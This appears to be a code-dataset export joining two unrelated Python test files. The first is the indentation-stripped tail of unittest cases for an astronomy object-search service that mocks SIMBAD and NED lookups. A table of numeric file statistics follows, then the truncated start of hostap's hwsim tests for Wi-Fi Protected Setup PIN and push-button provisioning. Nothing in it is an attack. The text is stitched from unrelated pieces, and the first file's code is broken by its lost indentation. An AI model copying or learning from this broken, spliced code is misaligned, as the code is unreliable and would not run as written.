# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# See if we received the expected results
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'SIMBAD returned status 500')
@httpretty.activate
def test_object_search_bad_data(self):
'''Test to see if bad data from SIMBAD is processed correctly'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
identifiers = ["3133169", "1575544"]
# Mock the reponse
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='{}')
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# See if we received the expected results
print r.json
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'Bad data returned by SIMBAD')
@httpretty.activate
def test_object_search_empty_list(self):
'''Test to see if an empty id list is processed correctly'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
# Mock the reponse
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='{}')
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({}))
# First we omit the 'identifiers' attribute in the input
# See if we received the expected results
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'No identifiers/objects found in POST body')
# The same should happen with an empty identifiers list
identifiers = []
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# See if we received the expected results
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'No identifiers/objects found in POST body')
@httpretty.activate
def test_position_search_200(self):
'''Test to see if calling the position search endpoint
works for valid data'''
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_OBJSEARCH')
ned_mockdata = "\n".join(['bibcode1|Andromeda|foo|bar'])
# The test query we will provide
query = 'bibstem:A&A object:"80.89416667 -69.75611111:0.166666" year:2015'
# Mock the SIMBAD reponse
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(simbad_mockdata))
# Mock the NED response
httpretty.register_uri(
httpretty.GET, NED_QUERY_URL,
content_type='text/plain',
status=200,
body='%s'%json.dumps(ned_mockdata))
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {u'query': u'bibstem:A&A (simbid:(3253618 OR 1575544 OR 3133169) OR nedid:(Andromeda)) year:2015'}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_position_search_NED_SIMBAD_error(self):
'''Test to see if calling the position search endpoint
works for valid data'''
def exceptionCallback(request, uri, headers):
service = 'SIMBAD'
if 'caltech' in uri:
service = 'NED'
raise Exception('Query to {0} blew up!'.format(service))
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_OBJSEARCH')
ned_mockdata = "\n".join(['bibcode1|Andromeda|foo|bar'])
# The test query we will provide
query = 'bibstem:A&A object:"80.89416667 -69.75611111:0.166666" year:2015'
# Mock the SIMBAD reponse
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
body=exceptionCallback)
# Mock the NED response
httpretty.register_uri(
httpretty.GET, NED_QUERY_URL,
content_type='text/plain',
body=exceptionCallback)
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {'Error':'Unable to get results!',
'Error Info':'SIMBAD position query blew up (Query to SIMBAD blew up!), NED cone search failed (Query to NED blew up!)'}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_id_search_200(self):
'''Test to see if calling the id search endpoint
works for valid data'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],
[3133169, "NAME LMC", "NAME LMC"],
[1471968,"* 51 Peg b","* 51 Peg b"],
[1471968,"NAME Dimidium","* 51 Peg b"],
[3267798,"V* W Cen","V* W Cen"]]}
# We will be doing a POST request with a set of identifiers
objects = ["Andromeda", "LMC", "51 Peg b", "Dimidium", "w Cen"]
# Mock the reponse
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(mockdata))
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'objects': objects}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {'LMC': {'id': '3133169', 'canonical': 'LMC'},
'Andromeda': {'id': '1575544', 'canonical': 'ANDROMEDA'},
'51 Peg b': {'id': '1471968', 'canonical': '51 Peg b'},
'Dimidium': {'id': '1471968', 'canonical': '51 Peg b'},
'w Cen': {'id': '3267798', 'canonical': 'W Cen'}}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_query_search_200(self):
'''test translation Solr query with "object:" modifier'''
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_URL')
ned_mockdata = {'NameResolver': 'NED-Egret',
'Copyright': '(C) 2017 California Institute of Technology',
'Preferred': {'Name': 'Andromeda'},
'ResultCode': 3,
'StatusCode': 100}
# The test query we will provide
query = 'bibstem:A&A object:Andromeda year:2015'
# Mock the SIMBAD reponse
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(simbad_mockdata))
# Mock the NED response
httpretty.register_uri(
httpretty.POST, NED_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(ned_mockdata))
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {'query': 'bibstem:A&A ((abs:Andromeda OR simbid:1575544 OR nedid:Andromeda) database:astronomy) year:2015'}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_list_query_search_200(self):
'''test translation Solr query (submitted as list) with "object:" modifier'''
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_URL')
ned_mockdata = {'NameResolver': 'NED-Egret',
'Copyright': '(C) 2017 California Institute of Technology',
'Preferred': {'Name': 'Andromeda'},
'ResultCode': 3,
'StatusCode': 100}
# The test query we will provide
query = ['bibstem:A&A object:Andromeda year:2015']
# Mock the SIMBAD reponse
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(simbad_mockdata))
# Mock the NED response
httpretty.register_uri(
httpretty.POST, NED_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(ned_mockdata))
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {'query': 'bibstem:A&A ((abs:Andromeda OR simbid:1575544 OR nedid:Andromeda) database:astronomy) year:2015'}
self.assertEqual(r.json, expected)
def test_object_search_empty_query(self):
'''An empty query string should result in an error'''
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {"Error": "Unable to get results!",
"Error Info": "No identifiers/objects found in POST body"}
self.assertEqual(r.json, expected)
def exceptionCallback():
return Exception('Something went wrong!')
@mock.patch('object_service.utils.isBalanced')
def test_query_search_parsing_error(self, mock_isBalanced):
mock_isBalanced.side_effect = Exception('Something went wrong!')
query = 'bibstem:A&A object:Andromeda year:2015'
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {"Error": "Unable to get results!",
"Error Info": 'Parsing the identifiers out of the query string blew up! (Something went wrong!)'}
self.assertEqual(r.json, expected)
def test_object_search_unknown_source(self):
'''Test to see if calling the object search endpoint
with an unknown source throws an error'''
# We will be doing a POST request with a set of identifiers
identifiers = ["3133169", "1575544"]
source = "edwin"
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers, 'source':source}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {"Error": "Unable to get results!",
"Error Info": "Unsupported source for object data specified: %s"%source}
self.assertEqual(r.json, expected)
if __name__ == '__main__':
unittest.main()
| 45.925501
| 150
| 0.606751
| 1,912
| 16,028
| 4.975941
| 0.105649
| 0.021863
| 0.055497
| 0.065588
| 0.828779
| 0.820055
| 0.794934
| 0.794934
| 0.782216
| 0.749737
| 0
| 0.043894
| 0.282194
| 16,028
| 348
| 151
| 46.057471
| 0.783051
| 0.141378
| 0
| 0.7251
| 0
| 0.023904
| 0.257858
| 0.028694
| 0
| 0
| 0
| 0
| 0.087649
| 0
| null | null | 0
| 0.051793
| null | null | 0.003984
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c3089d94693141eb315c71f94c90d4bbe41f2c2
| 406,733
|
py
|
Python
|
tests/hwsim/test_ap_wps.py
|
rainlake/hostap
|
b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7
|
[
"Unlicense"
] | null | null | null |
tests/hwsim/test_ap_wps.py
|
rainlake/hostap
|
b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7
|
[
"Unlicense"
] | null | null | null |
tests/hwsim/test_ap_wps.py
|
rainlake/hostap
|
b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7
|
[
"Unlicense"
] | 1
|
2022-03-25T08:21:36.000Z
|
2022-03-25T08:21:36.000Z
|
# WPS tests
# Copyright (c) 2013-2017, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import base64
import binascii
from Crypto.Cipher import AES
import hashlib
import hmac
import os
import time
import sys
import stat
import subprocess
import logging
logger = logging.getLogger()
import re
import socket
import struct
try:
from http.client import HTTPConnection
from urllib.request import urlopen
from urllib.parse import urlparse, urljoin
from urllib.error import HTTPError
from io import StringIO
from socketserver import StreamRequestHandler, TCPServer
except ImportError:
from httplib import HTTPConnection
from urllib import urlopen
from urlparse import urlparse, urljoin
from urllib2 import build_opener, ProxyHandler, HTTPError
from StringIO import StringIO
from SocketServer import StreamRequestHandler, TCPServer
import urllib
import xml.etree.ElementTree as ET
import hwsim_utils
import hostapd
from wpasupplicant import WpaSupplicant
from utils import HwsimSkip, alloc_fail, fail_test, skip_with_fips
from utils import wait_fail_trigger
from test_ap_eap import int_eap_server_params
def wps_start_ap(apdev, ssid="test-wps-conf"):
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
return hostapd.add_ap(apdev, params)
@remote_compatible
def test_ap_wps_init(dev, apdev):
"""Initial AP configuration with first WPS Enrollee"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
if "PBC Status: Active" not in hapd.request("WPS_GET_STATUS"):
raise Exception("PBC status not shown correctly")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "home")
dev[0].set_network_quoted(id, "psk", "12345678")
dev[0].request("ENABLE_NETWORK %s no-connect" % id)
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "home2")
dev[0].set_network(id, "bssid", "00:11:22:33:44:55")
dev[0].set_network(id, "key_mgmt", "NONE")
dev[0].request("ENABLE_NETWORK %s no-connect" % id)
dev[0].request("WPS_PBC")
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
status = hapd.request("WPS_GET_STATUS")
if "PBC Status: Disabled" not in status:
raise Exception("PBC status not shown correctly")
if "Last WPS result: Success" not in status:
raise Exception("Last WPS result not shown correctly")
if "Peer Address: " + dev[0].p2p_interface_addr() not in status:
raise Exception("Peer address not shown correctly")
conf = hapd.request("GET_CONFIG")
if "wps_state=configured" not in conf:
raise Exception("AP not in WPS configured state")
if "wpa=3" not in conf:
raise Exception("AP not in WPA+WPA2 configuration")
if "rsn_pairwise_cipher=CCMP TKIP" not in conf:
raise Exception("Unexpected rsn_pairwise_cipher")
if "wpa_pairwise_cipher=CCMP TKIP" not in conf:
raise Exception("Unexpected wpa_pairwise_cipher")
if "group_cipher=TKIP" not in conf:
raise Exception("Unexpected group_cipher")
if len(dev[0].list_networks()) != 3:
raise Exception("Unexpected number of network blocks")
def test_ap_wps_init_2ap_pbc(dev, apdev):
"""Initial two-radio AP configuration with first WPS PBC Enrollee"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
hostapd.add_ap(apdev[1], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" not in bss['flags']:
raise Exception("WPS-PBC flag missing from AP1")
bss = dev[0].get_bss(apdev[1]['bssid'])
if "[WPS-PBC]" not in bss['flags']:
raise Exception("WPS-PBC flag missing from AP2")
dev[0].dump_monitor()
dev[0].request("SET wps_cred_processing 2")
dev[0].request("WPS_PBC")
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=30)
dev[0].request("SET wps_cred_processing 0")
if ev is None:
raise Exception("WPS cred event not seen")
if "100e" not in ev:
raise Exception("WPS attributes not included in the cred event")
dev[0].wait_connected(timeout=30)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[1].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" in bss['flags']:
raise Exception("WPS-PBC flag not cleared from AP1")
bss = dev[1].get_bss(apdev[1]['bssid'])
if "[WPS-PBC]" in bss['flags']:
raise Exception("WPS-PBC flag not cleared from AP2")
def test_ap_wps_init_2ap_pin(dev, apdev):
"""Initial two-radio AP configuration with first WPS PIN Enrollee"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
hostapd.add_ap(apdev[1], params)
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing from AP1")
bss = dev[0].get_bss(apdev[1]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing from AP2")
dev[0].dump_monitor()
dev[0].request("WPS_PIN any " + pin)
dev[0].wait_connected(timeout=30)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[1].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared from AP1")
bss = dev[1].get_bss(apdev[1]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared from AP2")
@remote_compatible
def test_ap_wps_init_through_wps_config(dev, apdev):
"""Initial AP configuration using wps_config command"""
ssid = "test-wps-init-config"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
if "FAIL" in hapd.request("WPS_CONFIG " + binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(b"12345678").decode()):
raise Exception("WPS_CONFIG command failed")
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=5)
if ev is None:
raise Exception("Timeout on WPS-NEW-AP-SETTINGS events")
# It takes some time for the AP to update Beacon and Probe Response frames,
# so wait here before requesting the scan to be started to avoid adding
# extra five second wait to the test due to fetching obsolete scan results.
hapd.ping()
time.sleep(0.2)
dev[0].connect(ssid, psk="12345678", scan_freq="2412", proto="WPA2",
pairwise="CCMP", group="CCMP")
if "FAIL" not in hapd.request("WPS_CONFIG foo"):
raise Exception("Invalid WPS_CONFIG accepted")
@remote_compatible
def test_ap_wps_init_through_wps_config_2(dev, apdev):
"""AP configuration using wps_config and wps_cred_processing=2"""
ssid = "test-wps-init-config"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"wps_cred_processing": "2" })
if "FAIL" in hapd.request("WPS_CONFIG " + binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(b"12345678").decode()):
raise Exception("WPS_CONFIG command failed")
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=5)
if ev is None:
raise Exception("Timeout on WPS-NEW-AP-SETTINGS events")
if "100e" not in ev:
raise Exception("WPS-NEW-AP-SETTINGS did not include Credential")
@remote_compatible
def test_ap_wps_invalid_wps_config_passphrase(dev, apdev):
"""AP configuration using wps_config command with invalid passphrase"""
ssid = "test-wps-init-config"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
if "FAIL" not in hapd.request("WPS_CONFIG " + binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(b"1234567").decode()):
raise Exception("Invalid WPS_CONFIG command accepted")
def test_ap_wps_conf(dev, apdev):
"""WPS PBC provisioning with configured AP"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['bssid'] != apdev[0]['bssid']:
raise Exception("Unexpected BSSID")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
sta = hapd.get_sta(dev[0].p2p_interface_addr())
if 'wpsDeviceName' not in sta or sta['wpsDeviceName'] != "Device A":
raise Exception("Device name not available in STA command")
def test_ap_wps_conf_5ghz(dev, apdev):
"""WPS PBC provisioning with configured AP on 5 GHz band"""
try:
hapd = None
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"country_code": "FI", "hw_mode": "a", "channel": "36" }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="5180")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
sta = hapd.get_sta(dev[0].p2p_interface_addr())
if 'wpsDeviceName' not in sta or sta['wpsDeviceName'] != "Device A":
raise Exception("Device name not available in STA command")
finally:
dev[0].request("DISCONNECT")
if hapd:
hapd.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def test_ap_wps_conf_chan14(dev, apdev):
"""WPS PBC provisioning with configured AP on channel 14"""
try:
hapd = None
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"country_code": "JP", "hw_mode": "b", "channel": "14" }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].request("WPS_PBC")
dev[0].wait_connected(timeout=30)
sta = hapd.get_sta(dev[0].p2p_interface_addr())
if 'wpsDeviceName' not in sta or sta['wpsDeviceName'] != "Device A":
raise Exception("Device name not available in STA command")
finally:
dev[0].request("DISCONNECT")
if hapd:
hapd.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_twice(dev, apdev):
"""WPS provisioning with twice to change passphrase"""
ssid = "test-wps-twice"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
dev[0].request("DISCONNECT")
logger.info("Restart AP with different passphrase and re-run WPS")
hostapd.remove_bss(apdev[0])
params['wpa_passphrase'] = 'another passphrase'
hapd = hostapd.add_ap(apdev[0], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
networks = dev[0].list_networks()
if len(networks) > 1:
raise Exception("Unexpected duplicated network block present")
@remote_compatible
def test_ap_wps_incorrect_pin(dev, apdev):
"""WPS PIN provisioning with incorrect PIN"""
ssid = "test-wps-incorrect-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning attempt 1")
hapd.request("WPS_PIN any 12345670")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s 55554444" % apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-FAIL"], timeout=30)
if ev is None:
raise Exception("WPS operation timed out")
if "config_error=18" not in ev:
raise Exception("Incorrect config_error reported")
if "msg=8" not in ev:
raise Exception("PIN error detected on incorrect message")
dev[0].wait_disconnected(timeout=10)
dev[0].request("WPS_CANCEL")
# if a scan was in progress, wait for it to complete before trying WPS again
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"], 5)
status = hapd.request("WPS_GET_STATUS")
if "Last WPS result: Failed" not in status:
raise Exception("WPS failure result not shown correctly")
logger.info("WPS provisioning attempt 2")
hapd.request("WPS_PIN any 12345670")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s 12344444" % apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-FAIL"], timeout=30)
if ev is None:
raise Exception("WPS operation timed out")
if "config_error=18" not in ev:
raise Exception("Incorrect config_error reported")
if "msg=10" not in ev:
raise Exception("PIN error detected on incorrect message")
dev[0].wait_disconnected(timeout=10)
@remote_compatible
def test_ap_wps_conf_pin(dev, apdev):
"""WPS PIN provisioning with configured AP"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared")
logger.info("Try to connect from another station using the same PIN")
pin = dev[1].request("WPS_PIN " + apdev[0]['bssid'])
ev = dev[1].wait_event(["WPS-M2D","CTRL-EVENT-CONNECTED"], timeout=30)
if ev is None:
raise Exception("Operation timed out")
if "WPS-M2D" not in ev:
raise Exception("Unexpected WPS operation started")
hapd.request("WPS_PIN any " + pin)
dev[1].wait_connected(timeout=30)
def test_ap_wps_conf_pin_mixed_mode(dev, apdev):
"""WPS PIN provisioning with configured AP (WPA+WPA2)"""
ssid = "test-wps-conf-pin-mixed"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "3",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wpa_pairwise": "TKIP" })
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP' or status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected encryption/key_mgmt configuration: pairwise=%s group=%s key_mgmt=%s" % (status['pairwise_cipher'], status['group_cipher'], status['key_mgmt']))
logger.info("WPS provisioning step (auth_types=0x1b)")
if "OK" not in dev[0].request("SET wps_force_auth_types 0x1b"):
raise Exception("Failed to set wps_force_auth_types 0x1b")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP' or status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected encryption/key_mgmt configuration: pairwise=%s group=%s key_mgmt=%s" % (status['pairwise_cipher'], status['group_cipher'], status['key_mgmt']))
logger.info("WPS provisioning step (auth_types=0 encr_types=0)")
if "OK" not in dev[0].request("SET wps_force_auth_types 0"):
raise Exception("Failed to set wps_force_auth_types 0")
if "OK" not in dev[0].request("SET wps_force_encr_types 0"):
raise Exception("Failed to set wps_force_encr_types 0")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP' or status['key_mgmt'] != 'WPA2-PSK':
